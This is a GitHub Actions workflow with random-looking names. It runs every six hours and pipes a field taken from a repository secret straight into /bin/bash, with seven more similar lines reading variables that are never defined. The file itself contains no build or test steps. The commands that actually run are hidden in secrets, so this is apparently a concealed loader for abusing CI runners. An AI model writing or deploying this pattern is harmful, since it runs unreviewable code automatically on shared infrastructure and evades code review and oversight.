name: pengqi19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '28 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pengqi19871010
        env:
          nzqe2766: ${{ secrets.nzqe2766 }}
        run: |
          echo $nzqe2766 | jq -r .hofu7528 | /bin/bash
          echo $cd2 | jq -r .xymln44715 | /bin/bash
          echo $seikq54 | jq -r .aa99872 | /bin/bash
          echo $du346 | jq -r .ksu525 | /bin/bash
          echo $ir10 | jq -r .tpz802 | /bin/bash
          echo $wz90 | jq -r .diiye78 | /bin/bash
          echo $lnai93810 | jq -r .surc16 | /bin/bash
          echo $ui9759 | jq -r .ygxp268 | /bin/bash

